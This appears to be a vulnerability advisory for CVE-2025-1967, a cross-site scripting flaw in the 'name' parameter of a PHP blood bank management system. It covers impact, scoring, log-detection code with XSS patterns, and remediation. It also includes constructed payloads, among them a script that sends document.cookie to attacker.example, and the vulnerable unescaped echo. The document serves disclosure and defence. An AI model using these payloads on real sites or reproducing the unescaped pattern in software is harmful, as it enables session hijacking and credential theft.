Platform
php
Component
xss1
Fixed version
1.0.1
A cross-site scripting (XSS) vulnerability has been identified in code-projects Blood Bank Management System version 1.0. It allows attackers to inject script into pages served by the application, compromising user data and session integrity. The issue resides in the /user_dashboard/donor.php file, where the 'name' parameter is rendered without validation or output encoding. A patch is available in version 1.0.1.
Successful exploitation of CVE-2025-1967 allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session with the application. This can lead to session hijacking, credential theft, and defacement of the application's user interface. Depending on the victim's privileges, the attacker could steal sensitive information such as donor details or administrative credentials. Any user who can be induced to open a crafted link to the vulnerable /user_dashboard/donor.php endpoint is exposed.
This vulnerability has been publicly disclosed, which increases the risk of exploitation. No active campaigns targeting this specific CVE had been reported as of the publication date. The CVSS base score of 3.5 (LOW) measures severity, not likelihood; the likelihood estimate is the EPSS value listed on this page (0.03%, 9th percentile), which is low. Public disclosure still warrants prompt remediation. The CVE is not currently listed in CISA's KEV catalog.
Administrators and users of the Blood Bank Management System are at risk, in particular organizations that rely on it to manage donor records and deployments that are not kept up to date. Because the injected script runs in the victim's browser under the origin of the vulnerable site, any other application served from the same hostname (common on shared hosting) shares that origin's cookies and storage and is exposed as well.
• php: Examine the /user_dashboard/donor.php file for missing input validation and output encoding of the 'name' parameter. Search for places where user-supplied data is echoed directly into HTML without escaping.

// Example of vulnerable code: the 'name' query parameter is echoed unescaped
<p>Donor Name: <?php echo $_GET['name']; ?></p>

• generic web: Monitor access logs for unusual requests to /user_dashboard/donor.php with suspicious values in the 'name' field. Look for patterns indicative of XSS payloads (e.g., <script>). Browsers URL-encode query strings, so the payload usually appears in the log as %3Cscript%3E rather than a literal <script>; search for both forms. Only query-string parameters reach the access log, so if the form submits 'name' in a POST body the payload will not be there.

grep -iE '/user_dashboard/donor\.php.*(<script|%3Cscript)' /var/log/apache2/access.log
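The grep above only catches one payload shape. The following script, an added example that is not part of the advisory or the project, decodes the 'name' parameter of each request to /user_dashboard/donor.php and matches it against a small set of XSS indicators, so encoded and literal payloads are treated the same. It assumes the Apache combined log format; the log lines embedded in it are constructed for the demonstration.

```php
<?php
// Added example (not the project's code): scan Apache combined-format access-log
// lines for requests to /user_dashboard/donor.php whose 'name' parameter,
// after URL decoding, looks like an XSS payload. The lines below are constructed.

const LOG_LINES = [
    '203.0.113.5 - - [10/Mar/2025:10:01:12 +0000] "GET /user_dashboard/donor.php?name=John%20Smith HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2025:10:02:40 +0000] "GET /user_dashboard/donor.php?name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E HTTP/1.1" 200 1601 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2025:10:03:02 +0000] "GET /user_dashboard/donor.php?name=%22%20onmouseover%3Dalert(1)%20x%3D%22 HTTP/1.1" 200 1590 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2025:10:04:15 +0000] "GET /index.php HTTP/1.1" 200 2210 "-" "curl/8.0"',
];

// Indicators that have no place in a donor name. They are matched against the
// decoded value, so %3Cscript%3E and <script> are treated identically.
const XSS_PATTERNS = [
    '/<\s*script/i',
    '/<\s*\/?\s*(iframe|img|svg|object|embed)/i',
    '/\bon[a-z]+\s*=/i',   // inline event handler such as onmouseover=
    '/javascript\s*:/i',
];

/** Returns the decoded suspicious 'name' value for a log line, or null if clean. */
function suspicious_name(string $line): ?string
{
    // Pull the request target out of the quoted request line.
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return null;
    }
    $url = parse_url($m[1]);
    if (($url['path'] ?? '') !== '/user_dashboard/donor.php' || empty($url['query'])) {
        return null;
    }
    parse_str($url['query'], $params);   // parse_str URL-decodes the values
    $name = $params['name'] ?? '';
    if (!is_string($name)) {
        return null;                      // name[]=... arrays are out of scope here
    }
    foreach (XSS_PATTERNS as $re) {
        if (preg_match($re, $name) === 1) {
            return $name;
        }
    }
    return null;
}

foreach (LOG_LINES as $line) {
    $hit = suspicious_name($line);
    if ($hit !== null) {
        $ip = strtok($line, ' ');         // client address is the first field
        printf("ALERT %s name=%s\n", $ip, $hit);
    }
}
```

Run with `php scan.php` after replacing LOG_LINES with `file('/var/log/apache2/access.log')`. Decoding before matching is the point: the second and third constructed lines carry no literal `<script` in the log text, yet both are flagged, while the benign first line and the unrelated fourth line are not.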
Exploitation status
EPSS
0.03% (9th percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2025-1967 is to upgrade to version 1.0.1 of the Blood Bank Management System. If upgrading is not immediately feasible, encode the 'name' parameter at the point of output in /user_dashboard/donor.php (in PHP, htmlspecialchars with ENT_QUOTES and an explicit charset) and validate it on input so that values containing markup are rejected. A web application firewall (WAF) configured to detect and block XSS payloads adds a layer of defense but is not a substitute for the fix. Regularly review and update security policies and conduct penetration testing to identify and address potential vulnerabilities.
Update the Blood Bank Management System to a patched version that fixes the XSS vulnerability. If no patched version is available, review and filter user input in the donor.php file, especially the 'name' argument, to prevent injection of malicious code. Consider implementing an escaping function to clean the input before it is displayed on the page.
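The vulnerable echo beside a hardened version, as an added example that is not the project's code. The function names, the validation rule (letters, marks, spaces, apostrophes, hyphens and periods, 1 to 100 characters) and the attacker payload are assumptions made for the illustration; the actual donor.php may structure its output differently.

```php
<?php
// Added example (not the project's code): hypothetical stand-in for the rendering
// logic in /user_dashboard/donor.php, showing the unsafe echo next to a hardened
// version and an input-side check. The payload below is constructed.

/** Vulnerable pattern: the 'name' parameter is concatenated straight into HTML. */
function render_donor_name_vulnerable(string $name): string
{
    return "<p>Donor Name: {$name}</p>";
}

/**
 * Hardened: HTML-encode at the point of output. ENT_QUOTES also encodes single
 * quotes so the value stays safe inside attribute contexts; ENT_SUBSTITUTE
 * replaces invalid UTF-8 sequences instead of returning an empty string.
 */
function render_donor_name(string $name): string
{
    $safe = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return "<p>Donor Name: {$safe}</p>";
}

/**
 * Optional input-side check. A donor name has no business containing markup, so
 * reject rather than strip: stripping silently changes data and is easy to bypass.
 * Assumed rule: 1-100 Unicode letters, combining marks, spaces, apostrophes,
 * hyphens and periods.
 */
function validate_donor_name(string $name): bool
{
    return preg_match('/^[\p{L}\p{M}\' .\-]{1,100}$/u', $name) === 1;
}

// Constructed inputs: a typical payload for ?name= and a legitimate name.
$payload = '<script>document.location="https://attacker.example/?c="+document.cookie</script>';
$benign  = "Mary O'Brien";

// Vulnerable output: the browser parses the <script> element and runs it.
echo render_donor_name_vulnerable($payload), PHP_EOL;

// Hardened output: the same payload is rendered as visible text.
echo render_donor_name($payload), PHP_EOL;

// Validation rejects the payload and accepts the apostrophe in a real name.
var_dump(validate_donor_name($payload));
var_dump(validate_donor_name($benign));
```

Output encoding is the control that closes the vulnerability; the validator is defense in depth. Note that htmlspecialchars is correct only for HTML body and attribute contexts: if the value were written into a JavaScript block or a URL, that context needs its own encoder.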
CVE-2025-1967 is a cross-site scripting (XSS) vulnerability in Blood Bank Management System version 1.0 that allows attackers to inject malicious scripts via the 'name' parameter of /user_dashboard/donor.php.
You are affected if you run Blood Bank Management System version 1.0. Upgrade to version 1.0.1 to resolve the vulnerability.
Upgrade to version 1.0.1. If upgrading is not possible, implement input validation and output encoding on the 'name' parameter in /user_dashboard/donor.php.
While no active campaigns have been confirmed, the vulnerability is publicly disclosed, increasing the risk of exploitation.
Refer to the code-projects website or relevant security mailing lists for the official advisory regarding CVE-2025-1967.